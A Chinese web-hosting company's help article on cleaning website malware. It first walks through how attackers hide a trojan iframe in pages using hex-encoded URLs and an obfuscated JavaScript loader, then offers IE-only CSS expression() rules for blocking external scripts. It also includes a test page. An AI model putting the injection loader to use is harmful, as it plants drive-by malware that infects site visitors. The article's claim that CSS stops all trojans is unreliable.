香港虚拟主机
本站公告
新闻资讯
虚拟主机帮助
域名帮助
服务器帮助
邮箱帮助
建站帮助
网站推广帮助
VPS帮助
特色主机帮助
网站备案专题
会员帮助信息
代理帮助信息
成功案例
我司获香港虚拟主机排行榜十…
香港虚拟主机金秋促销活动正…
百度整治给SEO带来了新的希望
百度同时收录网站带WWW和不带…
百度对原创内容的判断标准 如…
如何建设网站 网站建设三步曲
如何挑选老域名 老域名有那些…
域名常见故障与分析
虚拟主机基本参数介绍
交换链接的技巧 谈一下选择交…
您现在的位置: 江南数联 >> 帮助中心 >> 建站帮助 >> 正文

网站病毒自己动手清除

  作者:admin    来源:本站原创    点击次数:29     更新时间:2012-9-1 6:34:42  
     
 
关注石头有礼
 
 

网站病毒自己动手清除

一、【网站分析病毒】

比如病毒地址是(郑重声明:巩义宇程网络http://www.5ctx.cn是正规的互联网基础服务提供商):http://www.5ctx.cn,先进行16进制的加密,成为
http://%77%77%77%2E%35%63%74%78%2E%63%6E/.
这个地址在url中也可以直接访问!然后进行病毒的代码就可写成:
<iframe src= http://%77%77%77%2E%35%63%74%78%2E%63%6E/ width=400 height=300></iframe>,
在对病毒的代码IFRAME代码复制到输入框中,点击“Encode加密”,得到加密后的代码:
%3Ciframe+src%3D+http%3A%2F%2F%2577%2577%2577%252E%2535%2563%2574%2578%252E%2563%256E%2F+width%3D400+height%3D300%3E%3C%2Fiframe%3E
然后,打开写字板程序,将下列代码输入到写字板中,并将加密代码复制到指定位置:

<SCRIPT LANGUAGE="Javascript"><!--
  var Words ="%3Ciframe+src%3D+http%3A%2F%2F%2577%2577%2577%252E%2535%2563%2574%2578%252E%2563%256E%2F+width%3D400+height%3D300%3E%3C%2Fiframe%3E" /*病毒地址代码*/
  function OutWord()
  {
  var NewWords;
  NewWords = unescape(Words)/*Words进行解密*/
  document.write(NewWords);
  }
  OutWord();
  //-->
  </SCRIPT>

最后,再将上面的这段代码进行JS加密后放入到希望插入木马的网页中即可。以后,当用户访问该网站时,就会激活木马---这就是现在流行的网站挂马方式了。

上面的代码加密后,代码如下:<script>document.write(unescape('%3CSCRIPT%20LANGUAGE%3D%22Javascript%22%3E%3C%21--%20%0D%0A%u3000%u3000var%20Words%20%3D%22%253Ciframe+src%253D+http%253A%252F%252F%252577%252577%252577%25252E%252535%252563%252574%252578%25252E%252563%25256E%252F+width%253D400+height%253D300%253E%253C%252Fiframe%253E%22%20/*%u75C5%u6BD2%u5730%u5740%u4EE3%u7801*/%0D%0A%u3000%u3000function%20OutWord%uFF08%uFF09%20%0D%0A%u3000%u3000%7B%20%0D%0A%u3000%u3000var%20NewWords%3B%20%0D%0A%u3000%u3000NewWords%20%3D%20unescape%uFF08Words%uFF09/*Words%u8FDB%u884C%u89E3%u5BC6*/%20%0D%0A%u3000%u3000document.write%uFF08NewWords%uFF09%3B%20%0D%0A%u3000%u3000%7D%20%0D%0A%u3000%u3000OutWord%uFF08%uFF09%3B%20%0D%0A%u3000%u3000//--%3E%20%0D%0A%u3000%u3000%3C/SCRIPT%3E'));</script>

(发现类似这样的代码,多半你的网站被挂马了----提醒!)

======================代码完===============================

【网站病毒如何防范】

方法病毒的出发点:script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是

其他<object>代码,不管这么多,来多少杀多少。

【网站培训中心 提供解决代码如下】--这个代码是css实现的,网上还有别的方法,你们可以找找:
解决方案1:
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}

原理:将<script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。
缺点:访客无法看到被感染了<script>木马的页面。

解决方案2:
iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}

原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。

解决方案3:
iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');}
script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');}

原理:同到外域的JS文件,立即调用IE私有的execCommand方法来停止页面所有请求,所以接下来的外域JS文件也被强制停止下载了。就像我们点了浏览器的“停止”按钮一样。看来这是JS模

拟IE停止按钮的一种方法。

解决方案4:
iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');}
script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');}

原理:将外域的JS文件的src重写成本地IE404错误页面的地址,这样,外域的JS代码不会下载。

解决方案5:
iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');}
script{noj5s:expression((this.id.toLowerCase().indexOf('vok')!=-1)?document.write('木马被成功隔离!'):''));}

以下页面代码里含有一个木马地址,而且木马在页面里重复了6次,大家分别用我上面的不同方案测试一下,看看我的研究如何!(此测试有一定的危险性,请务必打好所有补丁再测试)
 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-

transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>让JS木马的进程迅速中止的CSS代码</title>
<style type="text/css" id="LinrStudio">
/*<![CDATA[*/
iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}
script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');}
/* 以后请在此关注最新木马处理方法:http://www.nihaoku.cn/ff/api.htm */
/*]]>*/
</style>
</head>
<body>
<script type="text/javascript" src="cncnc.js"></script>
<script src=http://%77%77%77%2E%35%63%74%78%2E%63%6E/></script>
<script src="http://%77%77%77%2E%35%63%74%78%2E%63%6E/" type="text/javascript"></script>
<script src=http://%77%77%77%2E%35%63%74%78%2E%63%6E/></script>
我是页面本身的1
<script src=http://%77%77%77%2E%35%63%74%78%2E%63%6E/></script>
我是页面本身的2
<script src=http://%77%77%77%2E%35%63%74%78%2E%63%6E/></script>
我是页面本身的3
<script src=http://%77%77%77%2E%35%63%74%78%2E%63%6E/></script>
</body>
</html>
通过如上的代码测试,我们发现上面的6个加密的病毒代码都被屏蔽了。
综上所述,所有目前的挂马方式全都破解了,用CSS就可以解决所有木马问题,访客不会再轻易地中毒了。

本章关健词:江南数联 域名注册 海外虚拟主机 G享虚拟主机 国内虚拟主机 企业邮箱 网站建设 自助建站 400电话申请 微聚商

 
  版权申请:网站病毒自己动手清除出自江南数联dns06.com未经授权请勿转载!  
 
  • 上一篇帮助:

  • 下一篇帮助:
  •  
         

    扫一扫关注公众号有礼
    Copyright@2004-2015 江南数联 版权所有未经授权请勿复制!
    《中华人民共和国增值电信业务经营许可证》ISP证编号:皖B2-20080036 湘B2-20160056
    公司全称:永州石头网络技术有限公司(运营部)
    地址: 中国·湖南省永州市育才路158号 服务热线:400 616 9260
    安徽公司:安徽仁科信息技术有限公司 地址:合肥万和新城广场A-608 
    关注词:网站空间虚拟空间空间域名域名空间域名主机网站空间哪家好网站空间多少钱